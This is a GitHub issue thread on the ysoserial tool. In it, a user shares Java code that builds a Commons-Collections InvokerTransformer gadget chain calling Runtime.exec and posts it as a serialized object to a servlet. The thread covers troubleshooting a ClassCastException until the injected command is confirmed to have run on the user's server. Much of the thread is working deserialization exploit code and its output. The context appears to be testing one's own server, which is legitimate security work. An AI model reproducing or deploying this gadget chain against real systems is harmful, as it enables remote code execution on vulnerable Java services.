
Comments (11)

ercano commented on July 2, 2024

Seems that you created the payload with another JVM than the target runs with. Try the same JVM version.

from ysoserial.

ercano commented on July 2, 2024

Works. The JVM version didn't make any difference to the generated payload.

vektory79 commented on July 2, 2024

Same problem, even though I serialize and deserialize the object in one go.

Exception in thread "main" java.lang.ClassCastException: java.lang.Integer cannot be cast to java.util.Set
    at com.sun.proxy.$Proxy0.entrySet(Unknown Source)
    at sun.reflect.annotation.AnnotationInvocationHandler.readObject(AnnotationInvocationHandler.java:444)
    at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
    at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
    at java.lang.reflect.Method.invoke(Method.java:497)
    at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1058)
    at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1900)
    at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1801)
    at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1351)
    at java.io.ObjectInputStream.readObject(ObjectInputStream.java:371)
    at ru.krista.exploid.Exploid1.deserialize(Exploid1.java:113)
    at ru.krista.exploid.Exploid1.send(Exploid1.java:75)
    at ru.krista.exploid.Exploid1.main(Exploid1.java:30)
    at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
    at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
    at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
    at java.lang.reflect.Method.invoke(Method.java:497)
    at com.intellij.rt.execution.application.AppMain.main(AppMain.java:144)


ercano commented on July 2, 2024

What command did you execute with the payload?

vektory79 commented on July 2, 2024

I wrote just a small main method with some helpers:

        ByteArrayOutputStream byteOutputStream = new ByteArrayOutputStream();
        //serialize(byteOutputStream, request);
        serialize(byteOutputStream, getObject("echo You are hacked!!! > /media/data/hacked.txt"));
        servletConnection.setFixedLengthStreamingMode(byteOutputStream.size());
        OutputStream out = servletConnection.getOutputStream();

        byteOutputStream.writeTo(out);
        out.flush();

        Object test = deserialize(new ByteArrayInputStream(byteOutputStream.toByteArray())); // BANG! Exception here
...

    /**
     * Serializes and sends the packet
     * @param out the output stream
     * @param packetInfo the information packet
     */
    public static void serialize(OutputStream out, Object packetInfo) throws IOException {
        try (ObjectOutputStream oos = new ObjectOutputStream(out)) {
            oos.writeObject(packetInfo);
            oos.flush();
        }
    }

    /**
     * Deserializes and receives the packet
     * @param in the input stream
     * @return the resulting packet value
     */
    public static Object deserialize(InputStream in) throws IOException {
        Object result = null;
        try (ObjectInputStream oin = new ObjectInputStream(in)) {
            try {
                result = oin.readObject();
            } catch (ClassNotFoundException ex) {
                // do nothing
            }
            oin.close();
        }
        return result;
    }

    public static Object getObject(final String command) throws Exception {
        final String[] execArgs = new String[] { command };
        final Transformer transformerChain = new ChainedTransformer(
                new Transformer[]{ new ConstantTransformer(1) });
        final Transformer[] transformers = new Transformer[] {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[] {
                        String.class, Class[].class }, new Object[] {
                        "getRuntime", new Class[0] }),
                new InvokerTransformer("invoke", new Class[] {
                        Object.class, Object[].class }, new Object[] {
                        null, new Object[0] }),
                new InvokerTransformer("exec",
                        new Class[] { String.class }, execArgs),
                new ConstantTransformer(1) };
        final Map innerMap = new HashMap();
        final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
        final Map mapProxy = Gadgets.createMemoitizedProxy(lazyMap, Map.class);
        final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(mapProxy);
        Reflections.setFieldValue(transformerChain, "iTransformers", transformers);
        return handler;
    }

I think that I'm missing something, but I don't know what exactly.

ercano commented on July 2, 2024

What is your testing platform (win, linux, mac, ?)

vektory79 commented on July 2, 2024

Thank you for the quick answers.

My system is Ubuntu 14.04 amd64

Java version:
java version "1.8.0_66"
Java(TM) SE Runtime Environment (build 1.8.0_66-b17)
Java HotSpot(TM) 64-Bit Server VM (build 25.66-b17, mixed mode)


ercano commented on July 2, 2024

Did you check /media/data/hacked.txt?
I did "touch /tmp/hacked" and also got the exception, but the file was successfully created.

vektory79 commented on July 2, 2024

Thank you! It's just a problem with the "echo" command. :-)

And our server is vulnerable :-(

Thank you, again.


ercano commented on July 2, 2024

You're welcome.

frohoff commented on July 2, 2024

ClassCastException is expected in most cases but by that point the payload should have already executed. Closing.

from ysoserial.
